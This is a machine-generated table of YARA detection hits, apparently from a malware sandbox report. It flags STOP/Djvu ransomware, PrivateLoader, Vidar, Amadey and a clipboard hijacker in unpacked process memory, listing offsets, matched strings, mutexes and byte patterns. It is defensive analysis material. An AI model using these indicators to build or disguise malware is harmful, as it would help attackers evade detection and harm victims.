27.2.86ED.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.86ED.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
38.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
20.2.AF5C.exe.27415a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
20.2.AF5C.exe.27415a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.AF5C.exe.27415a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
20.2.AF5C.exe.27415a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.86ED.exe.27015a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
25.2.86ED.exe.27015a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.86ED.exe.27015a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.86ED.exe.27015a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.759F.exe.23a15a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
5.2.759F.exe.23a15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.759F.exe.23a15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.759F.exe.23a15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
22.2.9B15.exe.26615a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
22.2.9B15.exe.26615a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
22.2.9B15.exe.26615a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
22.2.9B15.exe.26615a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
34.2.build2.exe.37a15a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
23.2.AF5C.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
23.2.AF5C.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
23.2.AF5C.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
23.2.AF5C.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
30.2.759F.exe.22d15a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
30.2.759F.exe.22d15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
30.2.759F.exe.22d15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
30.2.759F.exe.22d15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.6C74.exe.23315a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
10.2.6C74.exe.23315a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.6C74.exe.23315a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.6C74.exe.23315a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
8.2.759F.exe.22f15a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
8.2.759F.exe.22f15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
8.2.759F.exe.22f15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
8.2.759F.exe.22f15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.759F.exe.22515a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
16.2.759F.exe.22515a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.759F.exe.22515a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.759F.exe.22515a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
5.2.759F.exe.23a15a0.1.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
5.2.759F.exe.23a15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
5.2.759F.exe.23a15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
5.2.759F.exe.23a15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.759F.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
17.2.759F.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.759F.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.759F.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.86ED.exe.27015a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
25.2.86ED.exe.27015a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.86ED.exe.27015a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.86ED.exe.27015a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
34.2.build2.exe.37a15a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
32.2.759F.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
32.2.759F.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
32.2.759F.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
32.2.759F.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
35.2.build3.exe.20000.0.unpack	JoeSecurity_Clipboard_Hijacker	Yara detected Clipboard Hijacker	Joe Security
35.2.build3.exe.20000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
35.2.build3.exe.20000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 02 00 6A 00 6A 00 FF 15 40 40 02 00 FF 15 2C 40 02 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 02 00 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 02 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
39.0.mstsca.exe.1360000.0.unpack	Windows_Trojan_Clipbanker_f9f9e79d	unknown	unknown	0x1203:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
39.0.mstsca.exe.1360000.0.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0xefa:$mutex_setup: 55 8B EC 83 EC 18 53 56 57 E8 F8 F4 FF FF 68 30 30 36 01 6A 00 6A 00 FF 15 40 40 36 01 FF 15 2C 40 36 01 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 36 01 0xf87:$new_line_check: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0xf87:$regex1: 0F B7 C2 89 45 EC 0F B7 C2 83 F8 0A 74 43 BA 0D 0A 00 00 66 3B C2 74 39 83 F8 0D 74 34 83 F8 20 74 2F 83 F8 09 74 2A 0x12ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x1335:$regex3: 56 8B F1 56 FF 15 20 40 36 01 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
40.2.D5B9.exe.4377990.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
14.2.759F.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
14.2.759F.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.759F.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.759F.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.759F.exe.400000.0.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
17.2.759F.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.759F.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.759F.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
20.2.AF5C.exe.27415a0.1.raw.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
20.2.AF5C.exe.27415a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
20.2.AF5C.exe.27415a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
20.2.AF5C.exe.27415a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
6.2.759F.exe.400000.0.unpack	JoeSecurity_PrivateLoader	Yara detected PrivateLoader	Joe Security
6.2.759F.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
6.2.759F.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
